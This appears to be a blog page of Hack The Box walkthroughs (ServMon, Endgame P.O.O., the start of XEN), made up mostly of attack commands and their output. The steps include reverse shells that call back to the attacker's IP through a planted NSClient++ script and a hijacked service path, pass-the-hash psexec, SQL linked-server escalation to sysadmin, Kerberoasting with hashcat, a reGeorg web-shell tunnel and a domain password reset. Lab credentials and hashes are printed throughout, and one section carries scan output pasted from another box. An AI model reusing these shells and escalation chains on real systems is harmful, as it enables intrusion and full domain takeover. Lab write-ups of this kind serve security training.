Protected: thm-hackpark-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-magic-nl

This content is password protected. To view it please enter your password below:

Posted on

htb-servmon-nl

htb-servmon

As always we start with a nmap scan

 

We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

LFI is https://www.exploit-db.com/exploits/47774

.

so we have the passwords

L1k3B1gBut7s@W0rk is the pasword for user Nadine for service

 

ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk

next we upload nc.exe to box

then
https://www.exploit-db.com/exploits/46802

C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Other way:

Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>

Author : Puckiestyle

htb-endgame-poo

Hack the Box – P.O.O ( writeup as of box retired by june 2020 )

As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp

python ds_store_exp.py http://10.13.38.11/.DS_Store

We have some interesting directories. I run IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.


This seemed to be details to a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}

Creating an sql user puckie  in sql studio

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

 

SHELL Access
I needed to enable xp_cmdshell


Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.


After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page


Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


POO{4882bd2ccfd4b5318978540d9843729f}

IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name=”Block network access for R local user accounts in SQL Server instance POO_PUBLIC”


And then I noticed an IPv6 address and another adapter.


I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-winrm to find the 4th flag

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}

I wanted to see what I could find out about the domain. Knowing that it is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier..

Kerberoasting
I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This come back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.


I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

Hashcat
I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.
p00_hr:Password123!

However, when I run the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files that lay within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r

Now that I had both these passwords cracked. I needed to try and gain access to the domain controller which was on 172.20.128.53.

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1


Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account names mr3ks


PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1
c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText 
$Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList 
$Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx


I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now for me to create my tunnel with reGeorge.

python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx


I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with Direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NerFx4Extended-ASPNET45 -All

…..extra…

kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL>

.

msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 - - POO\Administrator
[*] 10.13.38.11:1433 - - POO\Guest
[*] 10.13.38.11:1433 - - POO\krbtgt
[*] 10.13.38.11:1433 - - POO\DefaultAccount
[*] 10.13.38.11:1433 - - POO\Domain Admins
[*] 10.13.38.11:1433 - - POO\Domain Users
[*] 10.13.38.11:1433 - - POO\Domain Guests
[*] 10.13.38.11:1433 - - POO\Domain Computers
[*] 10.13.38.11:1433 - - POO\Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cert Publishers
[*] 10.13.38.11:1433 - - POO\Schema Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Admins
[*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 - - POO\Protected Users
[*] 10.13.38.11:1433 - - POO\Key Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 - - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\mr3ks
[*] 10.13.38.11:1433 - - POO\DC$
[*] 10.13.38.11:1433 - - POO\DnsAdmins
[*] 10.13.38.11:1433 - - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 - - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 - - POO\p00_hr
[*] 10.13.38.11:1433 - - POO\p00_dev
[*] 10.13.38.11:1433 - - POO\p00_adm
[*] 10.13.38.11:1433 - - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 - xp_cmdshell is Enabled
[*] 10.13.38.11:1433 - remote access is Enabled
[*] 10.13.38.11:1433 - allow updates is Not Enabled
[*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 - Database name:master
[*] 10.13.38.11:1433 - Database Files for master:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 - Database name:tempdb
[*] 10.13.38.11:1433 - Database Files for tempdb:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 - Database name:POO_PUBLIC
[*] 10.13.38.11:1433 - Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 - No Disabled Logins Found
[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 - No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 - No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 - No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 - sp_replsetsyncstatus
[*] 10.13.38.11:1433 - sp_replcounters
[*] 10.13.38.11:1433 - sp_replsendtoqueue
[*] 10.13.38.11:1433 - sp_resyncexecutesql
[*] 10.13.38.11:1433 - sp_prepexecrpc
[*] 10.13.38.11:1433 - sp_repltrans
[*] 10.13.38.11:1433 - sp_xml_preparedocument
[*] 10.13.38.11:1433 - xp_qv
[*] 10.13.38.11:1433 - xp_getnetname
[*] 10.13.38.11:1433 - sp_releaseschemalock
[*] 10.13.38.11:1433 - sp_refreshview
[*] 10.13.38.11:1433 - sp_replcmds
[*] 10.13.38.11:1433 - sp_unprepare
[*] 10.13.38.11:1433 - sp_resyncprepare
[*] 10.13.38.11:1433 - sp_createorphan
[*] 10.13.38.11:1433 - xp_dirtree
[*] 10.13.38.11:1433 - sp_replwritetovarbin
[*] 10.13.38.11:1433 - sp_replsetoriginator
[*] 10.13.38.11:1433 - sp_xml_removedocument
[*] 10.13.38.11:1433 - sp_repldone
[*] 10.13.38.11:1433 - sp_reset_connection
[*] 10.13.38.11:1433 - xp_fileexist
[*] 10.13.38.11:1433 - xp_fixeddrives
[*] 10.13.38.11:1433 - sp_getschemalock
[*] 10.13.38.11:1433 - sp_prepexec
[*] 10.13.38.11:1433 - xp_revokelogin
[*] 10.13.38.11:1433 - sp_execute_external_script
[*] 10.13.38.11:1433 - sp_resyncuniquetable
[*] 10.13.38.11:1433 - sp_replflush
[*] 10.13.38.11:1433 - sp_resyncexecute
[*] 10.13.38.11:1433 - xp_grantlogin
[*] 10.13.38.11:1433 - sp_droporphans
[*] 10.13.38.11:1433 - xp_regread
[*] 10.13.38.11:1433 - sp_getbindtoken
[*] 10.13.38.11:1433 - sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle

 

htb-endgame-xen

Hack the Box – XEN ( retired june 2020 )

1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb

NMAP

As always we start with a nmap scan

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
